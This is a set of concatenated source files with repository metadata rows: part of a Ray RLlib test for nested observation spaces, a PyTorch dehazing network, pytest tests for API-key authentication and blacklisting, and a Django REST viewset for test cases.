spaces.Box(low=0, high=1, shape=(10, 10, 3)),
spaces.Box(low=0, high=1, shape=(10, 10, 3)),
)
),
spaces.Discrete(5),
]
)
TUPLE_SAMPLES = [TUPLE_SPACE.sample() for _ in range(10)]
# Constraints on the Repeated space.
MAX_PLAYERS = 4
MAX_ITEMS = 7
MAX_EFFECTS = 2
ITEM_SPACE = spaces.Box(-5, 5, shape=(1,))
EFFECT_SPACE = spaces.Box(9000, 9999, shape=(4,))
PLAYER_SPACE = spaces.Dict(
{
"location": spaces.Box(-100, 100, shape=(2,)),
"items": Repeated(ITEM_SPACE, max_len=MAX_ITEMS),
"effects": Repeated(EFFECT_SPACE, max_len=MAX_EFFECTS),
"status": spaces.Box(-1, 1, shape=(10,)),
}
)
REPEATED_SPACE = Repeated(PLAYER_SPACE, max_len=MAX_PLAYERS)
REPEATED_SAMPLES = [REPEATED_SPACE.sample() for _ in range(10)]
class NestedDictEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = DICT_SPACE
self._spec = EnvSpec("NestedDictEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return DICT_SAMPLES[0]
def step(self, action):
self.steps += 1
return DICT_SAMPLES[self.steps], 1, self.steps >= 5, {}
class NestedTupleEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = TUPLE_SPACE
self._spec = EnvSpec("NestedTupleEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return TUPLE_SAMPLES[0]
def step(self, action):
self.steps += 1
return TUPLE_SAMPLES[self.steps], 1, self.steps >= 5, {}
class RepeatedSpaceEnv(gym.Env):
def __init__(self):
self.action_space = spaces.Discrete(2)
self.observation_space = REPEATED_SPACE
self._spec = EnvSpec("RepeatedSpaceEnv-v0")
self.steps = 0
def reset(self):
self.steps = 0
return REPEATED_SAMPLES[0]
def step(self, action):
self.steps += 1
return REPEATED_SAMPLES[self.steps], 1, self.steps >= 5, {}
class NestedMultiAgentEnv(MultiAgentEnv):
def __init__(self):
super().__init__()
self.observation_space = spaces.Dict(
{"dict_agent": DICT_SPACE, "tuple_agent": TUPLE_SPACE}
)
self.action_space = spaces.Dict(
{"dict_agent": spaces.Discrete(1), "tuple_agent": spaces.Discrete(1)}
)
self._agent_ids = {"dict_agent", "tuple_agent"}
self.steps = 0
def reset(self):
return {
"dict_agent": DICT_SAMPLES[0],
"tuple_agent": TUPLE_SAMPLES[0],
}
def step(self, actions):
self.steps += 1
obs = {
"dict_agent": DICT_SAMPLES[self.steps],
"tuple_agent": TUPLE_SAMPLES[self.steps],
}
rew = {
"dict_agent": 0,
"tuple_agent": 0,
}
dones = {"__all__": self.steps >= 5}
infos = {
"dict_agent": {},
"tuple_agent": {},
}
return obs, rew, dones, infos
class InvalidModel(TorchModelV2):
def forward(self, input_dict, state, seq_lens):
return "not", "valid"
class InvalidModel2(TFModelV2):
def forward(self, input_dict, state, seq_lens):
return tf.constant(0), tf.constant(0)
class TorchSpyModel(TorchModelV2, nn.Module):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
TorchModelV2.__init__(
self, obs_space, action_space, num_outputs, model_config, name
)
nn.Module.__init__(self)
self.fc = FullyConnectedNetwork(
obs_space.original_space["sensors"].spaces["position"],
action_space,
num_outputs,
model_config,
name,
)
def forward(self, input_dict, state, seq_lens):
pos = input_dict["obs"]["sensors"]["position"].detach().cpu().numpy()
front_cam = input_dict["obs"]["sensors"]["front_cam"][0].detach().cpu().numpy()
task = (
input_dict["obs"]["inner_state"]["job_status"]["task"]
.detach()
.cpu()
.numpy()
)
ray.experimental.internal_kv._internal_kv_put(
"torch_spy_in_{}".format(TorchSpyModel.capture_index),
pickle.dumps((pos, front_cam, task)),
overwrite=True,
)
TorchSpyModel.capture_index += 1
return self.fc(
{"obs": input_dict["obs"]["sensors"]["position"]}, state, seq_lens
)
def value_function(self):
return self.fc.value_function()
class TorchRepeatedSpyModel(TorchModelV2, nn.Module):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
TorchModelV2.__init__(
self, obs_space, action_space, num_outputs, model_config, name
)
nn.Module.__init__(self)
self.fc = FullyConnectedNetwork(
obs_space.original_space.child_space["location"],
action_space,
num_outputs,
model_config,
name,
)
def forward(self, input_dict, state, seq_lens):
ray.experimental.internal_kv._internal_kv_put(
"torch_rspy_in_{}".format(TorchRepeatedSpyModel.capture_index),
pickle.dumps(input_dict["obs"].unbatch_all()),
overwrite=True,
)
TorchRepeatedSpyModel.capture_index += 1
return self.fc(
{"obs": input_dict["obs"].values["location"][:, 0]}, state, seq_lens
)
def value_function(self):
return self.fc.value_function()
def to_list(value):
if isinstance(value, list):
return [to_list(x) for x in value]
elif isinstance(value, dict):
return {k: to_list(v) for k, v in value.items()}
elif isinstance(value, np.ndarray):
return value.tolist()
elif isinstance(value, int):
return value
else:
return value.detach().cpu().numpy().tolist()
class DictSpyModel(TFModelV2):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
super().__init__(obs_space, action_space, None, model_config, name)
# Will only feed in sensors->pos.
input_ = tf.keras.layers.Input(
shape=self.obs_space["sensors"]["position"].shape
)
self.num_outputs = num_outputs or 64
out = tf.keras.layers.Dense(self.num_outputs)(input_)
self._main_layer = tf.keras.models.Model([input_], [out])
def forward(self, input_dict, state, seq_lens):
def spy(pos, front_cam, task):
# TF runs this function in an isolated context, so we have to use
# redis to communicate back to our suite
ray.experimental.internal_kv._internal_kv_put(
"d_spy_in_{}".format(DictSpyModel.capture_index),
pickle.dumps((pos, front_cam, task)),
overwrite=True,
)
DictSpyModel.capture_index += 1
return np.array(0, dtype=np.int64)
spy_fn = tf1.py_func(
spy,
[
input_dict["obs"]["sensors"]["position"],
input_dict["obs"]["sensors"]["front_cam"][0],
input_dict["obs"]["inner_state"]["job_status"]["task"],
],
tf.int64,
stateful=True,
)
with tf1.control_dependencies([spy_fn]):
output = self._main_layer([input_dict["obs"]["sensors"]["position"]])
return output, []
class TupleSpyModel(TFModelV2):
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config, name):
super().__init__(obs_space, action_space, None, model_config, name)
# Will only feed in 0th index of observation Tuple space.
input_ = tf.keras.layers.Input(shape=self.obs_space[0].shape)
self.num_outputs = num_outputs or 64
out = tf.keras.layers.Dense(self.num_outputs)(input_)
self._main_layer = tf.keras.models.Model([input_], [out])
def forward(self, input_dict, state, seq_lens):
def spy(pos, cam, task):
# TF runs this function in an isolated context, so we have to use
# redis to communicate back to our suite
ray.experimental.internal_kv._internal_kv_put(
"t_spy_in_{}".format(TupleSpyModel.capture_index),
pickle.dumps((pos, cam, task)),
overwrite=True,
)
TupleSpyModel.capture_index += 1
return np.array(0, dtype=np.int64)
spy_fn = tf1.py_func(
spy,
[
input_dict["obs"][0],
input_dict["obs"][1][0],
input_dict["obs"][2],
],
tf.int64,
stateful=True,
)
with tf1.control_dependencies([spy_fn]):
output = tf1.layers.dense(input_dict["obs"][0], self.num_outputs)
return output, []
class NestedObservationSpacesTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
ray.init(num_cpus=5)
@classmethod
def tearDownClass(cls):
ray.shutdown()
def test_invalid_model(self):
ModelCatalog.register_custom_model("invalid", InvalidModel)
self.assertRaisesRegex(
ValueError,
"Subclasses of TorchModelV2 must also inherit from nn.Module",
lambda: PGTrainer(
env="CartPole-v0",
config={
"model": {
"custom_model": "invalid",
},
"framework": "torch",
},
),
)
def test_invalid_model2(self):
ModelCatalog.register_custom_model("invalid2", InvalidModel2)
self.assertRaisesRegex(
ValueError,
"State output is not a list",
lambda: PGTrainer(
env="CartPole-v0",
config={
"model": {
"custom_model": "invalid2",
},
"framework": "tf",
},
),
)
def do_test_nested_dict(self, make_env, test_lstm=False):
ModelCatalog.register_custom_model("composite", DictSpyModel)
register_env("nested", make_env)
pg = PGTrainer(
env="nested",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite",
"use_lstm": test_lstm,
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
DictSpyModel.capture_index = 0
pg.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("d_spy_in_{}".format(i))
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = DICT_SAMPLES[i]["inner_state"]["job_status"]["task"]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def do_test_nested_tuple(self, make_env):
ModelCatalog.register_custom_model("composite2", TupleSpyModel)
register_env("nested2", make_env)
pg = PGTrainer(
env="nested2",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite2",
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TupleSpyModel.capture_index = 0
pg.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("t_spy_in_{}".format(i))
)
pos_i = TUPLE_SAMPLES[i][0].tolist()
cam_i = TUPLE_SAMPLES[i][1][0].tolist()
task_i = TUPLE_SAMPLES[i][2]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def test_nested_dict_gym(self):
self.do_test_nested_dict(lambda _: NestedDictEnv())
def test_nested_dict_gym_lstm(self):
self.do_test_nested_dict(lambda _: NestedDictEnv(), test_lstm=True)
def test_nested_dict_vector(self):
self.do_test_nested_dict(
lambda _: VectorEnv.vectorize_gym_envs(lambda i: NestedDictEnv())
)
def test_nested_dict_serving(self):
self.do_test_nested_dict(lambda _: SimpleServing(NestedDictEnv()))
def test_nested_dict_async(self):
self.do_test_nested_dict(lambda _: convert_to_base_env(NestedDictEnv()))
def test_nested_tuple_gym(self):
self.do_test_nested_tuple(lambda _: NestedTupleEnv())
def test_nested_tuple_vector(self):
self.do_test_nested_tuple(
lambda _: VectorEnv.vectorize_gym_envs(lambda i: NestedTupleEnv())
)
def test_nested_tuple_serving(self):
self.do_test_nested_tuple(lambda _: SimpleServing(NestedTupleEnv()))
def test_nested_tuple_async(self):
self.do_test_nested_tuple(lambda _: convert_to_base_env(NestedTupleEnv()))
def test_multi_agent_complex_spaces(self):
ModelCatalog.register_custom_model("dict_spy", DictSpyModel)
ModelCatalog.register_custom_model("tuple_spy", TupleSpyModel)
register_env("nested_ma", lambda _: NestedMultiAgentEnv())
act_space = spaces.Discrete(2)
pg = PGTrainer(
env="nested_ma",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"multiagent": {
"policies": {
"tuple_policy": (
None,
TUPLE_SPACE,
act_space,
{"model": {"custom_model": "tuple_spy"}},
),
"dict_policy": (
None,
DICT_SPACE,
act_space,
{"model": {"custom_model": "dict_spy"}},
),
},
"policy_mapping_fn": lambda aid, **kwargs: {
"tuple_agent": "tuple_policy",
"dict_agent": "dict_policy",
}[aid],
},
"framework": "tf",
"disable_env_checking": True,
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TupleSpyModel.capture_index = DictSpyModel.capture_index = 0
pg.train()
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("d_spy_in_{}".format(i))
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = DICT_SAMPLES[i]["inner_state"]["job_status"]["task"]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get("t_spy_in_{}".format(i))
)
pos_i = TUPLE_SAMPLES[i][0].tolist()
cam_i = TUPLE_SAMPLES[i][1][0].tolist()
task_i = TUPLE_SAMPLES[i][2]
self.assertEqual(seen[0][0].tolist(), pos_i)
self.assertEqual(seen[1][0].tolist(), cam_i)
check(seen[2][0], task_i)
def test_rollout_dict_space(self):
register_env("nested", lambda _: NestedDictEnv())
agent = PGTrainer(env="nested", config={"framework": "tf"})
agent.train()
path = agent.save()
agent.stop()
# Test train works on restore
agent2 = PGTrainer(env="nested", config={"framework": "tf"})
agent2.restore(path)
agent2.train()
# Test rollout works on restore
rollout(agent2, "nested", 100)
def test_py_torch_model(self):
ModelCatalog.register_custom_model("composite", TorchSpyModel)
register_env("nested", lambda _: NestedDictEnv())
a2c = A2CTrainer(
env="nested",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "composite",
},
"framework": "torch",
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TorchSpyModel.capture_index = 0
a2c.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get(
"torch_spy_in_{}".format(i)
)
)
pos_i = DICT_SAMPLES[i]["sensors"]["position"].tolist()
cam_i = DICT_SAMPLES[i]["sensors"]["front_cam"][0].tolist()
task_i = one_hot(DICT_SAMPLES[i]["inner_state"]["job_status"]["task"], 5)
# Only look at the last entry (-1) in `seen` as we reset (re-use)
# the ray-kv indices before training.
self.assertEqual(seen[0][-1].tolist(), pos_i)
self.assertEqual(seen[1][-1].tolist(), cam_i)
check(seen[2][-1], task_i)
# TODO(ekl) should probably also add a test for TF/eager
def test_torch_repeated(self):
ModelCatalog.register_custom_model("r1", TorchRepeatedSpyModel)
register_env("repeat", lambda _: RepeatedSpaceEnv())
a2c = A2CTrainer(
env="repeat",
config={
"num_workers": 0,
"rollout_fragment_length": 5,
"train_batch_size": 5,
"model": {
"custom_model": "r1",
},
"framework": "torch",
},
)
# Skip first passes as they came from the TorchPolicy loss
# initialization.
TorchRepeatedSpyModel.capture_index = 0
a2c.train()
# Check that the model sees the correct reconstructed observations
for i in range(4):
seen = pickle.loads(
ray.experimental.internal_kv._internal_kv_get(
"torch_rspy_in_{}".format(i)
)
)
# Only look at the last entry (-1) in `seen` as we reset (re-use)
# the ray-kv indices before training.
self.assertEqual(to_list(seen[:][-1]), to_list(REPEATED_SAMPLES[i]))
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| 33.982972
| 87
| 0.561518
|
fd8b0c101865fd458201a67da28e04beb4c24234
| 1,792
|
py
|
Python
|
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | 1
|
2022-02-12T13:04:08.000Z
|
2022-02-12T13:04:08.000Z
|
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | null | null | null |
model/AtmLocal.py
|
perseveranceLX/iterative-dehaze
|
dc5d56b2bf86460fff9d478e68368d2fffe78ba4
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
def make_model():
return AtmLocal()
class DoubleConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(DoubleConv, self).__init__()
self.conv = nn.Sequential(
nn.Conv2d(in_ch, out_ch, 3, padding=1),
nn.GroupNorm(4, out_ch),
nn.ReLU(),
nn.Conv2d(out_ch, out_ch, 3, padding=1),
nn.GroupNorm(4, out_ch),
nn.ReLU()
)
def forward(self, x):
x = self.conv(x)
return x
class InConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(InConv, self).__init__()
self.conv = DoubleConv(in_ch, out_ch)
def forward(self, x):
x = self.conv(x)
return x
class DownConv(nn.Module):
def __init__(self, in_ch, out_ch):
super(DownConv, self).__init__()
self.mpconv = nn.Sequential(
nn.MaxPool2d(kernel_size=7, stride=2, padding=1),
DoubleConv(in_ch, out_ch)
)
def forward(self, x):
x = self.mpconv(x)
return x
class AtmLocal(nn.Module):
def __init__(self, n_channels=3, out_channels=3):
super(AtmLocal, self).__init__()
self.inc = InConv(n_channels, 64)
self.down1 = DownConv(64, 128)
self.down2 = DownConv(128, 128)
self.down3 = DownConv(128, 256)
self.down4 = DownConv(256, 256)
self.pool = nn.AdaptiveMaxPool2d(1)
self.dense = nn.Linear(256, out_channels)
def forward(self, x):
x = self.inc(x)
x = self.down1(x)
x = self.down2(x)
x = self.down3(x)
x = self.down4(x)
x = self.pool(x)
x = x.view(-1, 256)
x = self.dense(x)
return torch.sigmoid(x)
| 28.903226
| 61
| 0.563058
|
327df298c58bff808fe1e9accdaf480c2404b631
| 4,261
|
py
|
Python
|
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | null | null | null |
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | null | null | null |
tests/unit/test_auth.py
|
danofsatx/resources_api
|
664532ee3ab4cb7c5000166d84ba371cf8b7713a
|
[
"MIT"
] | 1
|
2019-02-11T20:04:50.000Z
|
2019-02-11T20:04:50.000Z
|
from unittest.mock import patch
from app.api.auth import (ApiKeyError, ApiKeyErrorCode, authenticate,
blacklist_key, find_key_by_apikey_or_email,
rotate_key)
from app.models import Key
from flask import g
FAKE_EMAIL = 'test@example.org'
FAKE_APIKEY = 'abcdef1234567890'
def create_fake_key(session, **kwargs):
kwargs['email'] = kwargs.get('email', FAKE_EMAIL)
kwargs['apikey'] = kwargs.get('apikey', FAKE_APIKEY)
key = Key(**kwargs)
session.add(key)
session.commit()
return key
def test_authenticate_failure(module_client, function_empty_db):
# Arrange
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result[1] == 401
def test_authenticate_success(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result == 1
assert g.auth_key == key
def test_authenticate_blacklisted(module_client, function_empty_db):
# Arrange
create_fake_key(function_empty_db.session, blacklisted=True)
def callback(*args, **kwargs):
return 1
# Act
wrapper = authenticate(callback)
with patch('app.api.auth.request') as fake_request:
fake_request.headers = {
'x-apikey': FAKE_APIKEY
}
result = wrapper()
# Assert
assert result[1] == 401
def test_find_key_by_apikey_or_email(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
# Act
key1 = find_key_by_apikey_or_email(FAKE_EMAIL)
key2 = find_key_by_apikey_or_email(FAKE_APIKEY)
# Assert
assert key == key1
assert key == key2
def test_blacklist_key_not_found(module_client, function_empty_db):
# Arrange
error = None
# Act
try:
blacklist_key(FAKE_APIKEY + 'b', True, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.NOT_FOUND
def test_blacklist_key_already_blacklisted(module_client, function_empty_db):
# Arrange
error = None
key1 = None
create_fake_key(function_empty_db.session, blacklisted=True)
# Act
try:
key1 = blacklist_key(FAKE_APIKEY, True, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.ALREADY_BLACKLISTED
assert key1 is None
def test_blacklist_key_not_blacklisted(module_client, function_empty_db):
# Arrange
error = None
key1 = None
create_fake_key(function_empty_db.session)
# Act
try:
key1 = blacklist_key(FAKE_APIKEY, False, function_empty_db.session)
except ApiKeyError as e:
error = e
# Assert
assert error.error_code == ApiKeyErrorCode.NOT_BLACKLISTED
assert key1 is None
def test_blacklist_key_set_blacklisted_on(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
# Act
key1 = blacklist_key(FAKE_APIKEY, True, function_empty_db.session)
# Assert
assert key.blacklisted
assert key == key1
def test_blacklist_key_set_blacklisted_off(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session, blacklisted=True)
# Act
key1 = blacklist_key(FAKE_APIKEY, False, function_empty_db.session)
# Assert
assert not key.blacklisted
assert key == key1
def test_rotate_key(module_client, function_empty_db):
# Arrange
key = create_fake_key(function_empty_db.session)
function_empty_db.session.add(key)
function_empty_db.session.commit()
# Act
rotate_key(key, function_empty_db.session)
# Assert
assert key.apikey != FAKE_APIKEY
| 24.488506
| 77
| 0.687397
|
ed561c25178db103ab458e58e2303f5d6ad6dda0
| 4,725
|
py
|
Python
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 61
|
2017-01-22T04:38:32.000Z
|
2022-03-07T00:04:37.000Z
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 10
|
2016-05-20T00:11:33.000Z
|
2017-02-13T01:43:09.000Z
|
third_party/lemonscript_transpiler/objects/file.py
|
hansonl02/frc-robot-code
|
4b120c917a7709df9f010c9089a87c320bab3a16
|
[
"MIT"
] | 17
|
2017-05-12T15:32:03.000Z
|
2021-12-09T12:49:38.000Z
|
import re
from .logger import Logger
class File(object):
"""
This class represents a file that can have parts of it replaced with text
or another file.
"Tags" in the file are represented by strings enclosed in pairs of 3 angle
brackets. For example:
file.txt:
---
My favorite animal is <<<animal>>>.
<<<this is a tag>>>
This text will be kept as-is.
---
Calling replace_text("animal", "octocat") will cause the string
"<<<animal>>>" to be replaced with the string "octocat"
"""
def __init__(self, text, replacements=None, remove_modelines=5):
"""
Creates a File object from a string representing the contents of a file,
and, optionally, a list of replacements to be done on the file.
        Replacements are in the form that is taken by File.replace()
"""
self.init_text = text
self.text = self.init_text
if replacements is not None:
self.replace(replacements)
if remove_modelines > 0:
self.remove_modelines(remove_modelines)
def replace(self, replacements):
"""
Take a list of multiple replacements, and perform all of them. If you
just want to do one replacement, do not use this function!
The list of replacements is in the format of:
[
["function_name", "key", "replacement/file"],
...
]
Where function_name is the name of any text replacement function
(currently "replace_text", "replace_file", "insert_text", or
"insert_file"), "key" is the tag to be replaced (without the enclosing
        angle brackets), and "replacement/file" is the text or filename that the
tag will be replaced with.
"""
actions = {
"replace_text": self.replace_text,
"replace_file": self.replace_file,
"insert_text": self.insert_text,
"insert_file": self.insert_file
}
for replacement in replacements:
actions[replacement[0]](replacement[1], replacement[2])
def replace_text(self, key, text):
"""
Replace a tag with a string
key is the tag to be replaced, without the enclosing angle brackets
text is the string to replace it with
"""
Logger.debug("Replacing tag {0} with \"{1}\"...".format(key, text[:45].replace("\n", "\\n")))
replace_text = "<<<{}>>>".format(key)
self.text = self.text.replace(replace_text, text)
def replace_file(self, key, file_name):
"""
Replace a tag with the contents of a file
key is the tag to be replaced, without the enclosing angle brackets
file_name is name of the file that it will be replaced with
"""
Logger.debug("Replacing tag {0} with file {1}".format(key, file_name))
self.replace_text(key, open(file_name).read())
def insert_text(self, key, text):
"""
Insert text directly after a tag
This assumes that the tag is the last thing on a line. For example:
good:
//<<<tag>>>
bad:
/*
stuff
<<<tag>>>*/
key is the tag to be replaced, without the enclosing angle brackets
text is the string that will be inserted
"""
Logger.debug("Inserting \"{1}\"... at tag {0}".format(key, text[:45].replace("\n", "\\n")))
replace_text = "<<<{}>>>".format(key)
if self.text.find(replace_text) != -1:
insert_at = self.text.find(replace_text) + len(replace_text) + 1 # Next line
self.text = self.text[:insert_at] + text + "\n" + self.text[insert_at:]
def insert_file(self, key, file_name):
"""
Insert a file directly after a tag
This assumes that the tag is the last thing on a line. For example:
good:
//<<<tag>>>
bad:
/*
stuff
<<<tag>>>*/
key is the tag to be replaced, without the enclosing angle brackets
file_name is the name of the file that it will be replaced with
"""
Logger.debug("Inserting file {1} at tag {0}".format(key, file_name))
self.insert_text(key, open(file_name).read())
def remove_modelines(self, n=5):
Logger.debug("Removing modelines from file (Searching first {} lines)".format(n))
line_num = 1
output_lines = []
modeline_regex = re.compile(r"(\A|$)((//)|#)\s*vim\s*:[^:]+:")
for line in self.text.split("\n"):
if not (modeline_regex.match(line) and line_num <= n):
output_lines.append(line)
line_num += 1
self.text = "\n".join(output_lines)
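# Usage sketch (illustrative only, not part of the transpiler):
#
#     template = File("My favorite animal is <<<animal>>>.\n//<<<includes>>>\n")
#     template.replace_text("animal", "octocat")
#     template.replace([["insert_text", "includes", "#include <vector>"]])
#     # template.text now reads:
#     #   My favorite animal is octocat.
#     #   //<<<includes>>>
#     #   #include <vector>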
| 33.510638
| 101
| 0.591111
|
aac467b66cc102d15e706652fffb0542ad02156a
| 3,224
|
py
|
Python
|
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
distributed/http/scheduler/prometheus/semaphore.py
|
cameron16/distributed
|
fd611cb032d4161b20a8e9a500e9b76c9ef2c17c
|
[
"BSD-3-Clause"
] | null | null | null |
class SemaphoreMetricExtension:
def __init__(self, dask_server):
self.server = dask_server
def collect(self):
from prometheus_client.core import CounterMetricFamily, GaugeMetricFamily
sem_ext = self.server.extensions["semaphores"]
semaphore_max_leases_family = GaugeMetricFamily(
"semaphore_max_leases",
"Maximum leases allowed per semaphore, this will be constant for each semaphore during its lifetime.",
labels=["name"],
)
semaphore_active_leases_family = GaugeMetricFamily(
"semaphore_active_leases",
"Amount of currently active leases per semaphore.",
labels=["name"],
)
semaphore_pending_leases = GaugeMetricFamily(
"semaphore_pending_leases",
"Amount of currently pending leases per semaphore.",
labels=["name"],
)
semaphore_acquire_total = CounterMetricFamily(
"semaphore_acquire_total",
"Total number of leases acquired per semaphore.",
labels=["name"],
)
semaphore_release_total = CounterMetricFamily(
"semaphore_release_total",
"Total number of leases released per semaphore.\n"
"Note: if a semaphore is closed while there are still leases active, this count will not equal "
"`semaphore_acquired_total` after execution.",
labels=["name"],
)
semaphore_average_pending_lease_time = GaugeMetricFamily(
"semaphore_average_pending_lease_time",
"Exponential moving average of the time it took to acquire a lease per semaphore.\n"
"Note: this only includes time spent on scheduler side, "
"it does"
" not include time spent on communication.\n"
"Note: this average is calculated based on order of leases instead of time of lease acquisition.",
labels=["name"],
unit="s",
)
for semaphore_name, semaphore_max_leases in sem_ext.max_leases.items():
semaphore_max_leases_family.add_metric(
[semaphore_name], semaphore_max_leases
)
semaphore_active_leases_family.add_metric(
[semaphore_name], len(sem_ext.leases[semaphore_name])
)
semaphore_pending_leases.add_metric(
[semaphore_name], sem_ext.metrics["pending"][semaphore_name]
)
semaphore_acquire_total.add_metric(
[semaphore_name], sem_ext.metrics["acquire_total"][semaphore_name]
)
semaphore_release_total.add_metric(
[semaphore_name], sem_ext.metrics["release_total"][semaphore_name]
)
semaphore_average_pending_lease_time.add_metric(
[semaphore_name],
sem_ext.metrics["average_pending_lease_time"][semaphore_name],
)
yield semaphore_max_leases_family
yield semaphore_active_leases_family
yield semaphore_pending_leases
yield semaphore_acquire_total
yield semaphore_release_total
yield semaphore_average_pending_lease_time
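A hedged sketch of how a collector written in this style can be exercised outside the scheduler. The stand-in server object below only mimics the extensions["semaphores"] layout that collect() reads; it is illustrative, not the real distributed wiring.

from collections import defaultdict
from types import SimpleNamespace

from prometheus_client.core import REGISTRY

# Fake extension state carrying just the attributes collect() touches
fake_sem_ext = SimpleNamespace(
    max_leases={"example-sem": 2},
    leases={"example-sem": {"lease-1"}},
    metrics={
        "pending": defaultdict(int),
        "acquire_total": defaultdict(int),
        "release_total": defaultdict(int),
        "average_pending_lease_time": defaultdict(float),
    },
)
fake_server = SimpleNamespace(extensions={"semaphores": fake_sem_ext})

# Registering the collector makes its metric families appear on the next scrape
REGISTRY.register(SemaphoreMetricExtension(fake_server))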
| 41.87013
| 114
| 0.634926
|
d74655eba30a9edb904558651d26bc7d3a619e22
| 2,147
|
py
|
Python
|
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | 1
|
2022-03-24T05:33:30.000Z
|
2022-03-24T05:33:30.000Z
|
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | null | null | null |
apps/api/views/case_views.py
|
ranyong1997/Sakura_Infinity
|
700c3e8497077b266958f1d26525469d1f0cd87f
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from rest_framework import filters
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets
from rest_framework.permissions import IsAuthenticated
from ..permissions import IsOwnerOrReadOnly
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from element.models import Case
from api.serializers import CaseListSerializer, CaseSerializer
from util.jsresponse import JsResponse
class CaseViewSet(viewsets.ModelViewSet):
"""
    Test case information API
"""
permission_classes = (IsAuthenticated, IsOwnerOrReadOnly)
queryset = Case.objects.all()
serializer_class = CaseSerializer
    # Configure the commonly used filter backends: DjangoFilterBackend, SearchFilter and OrderingFilter
filter_backends = (DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter)
    # Search filtering
search_fields = ('moduleid__module_name', 'title', 'casename', 'isdone', 'maintainer',)
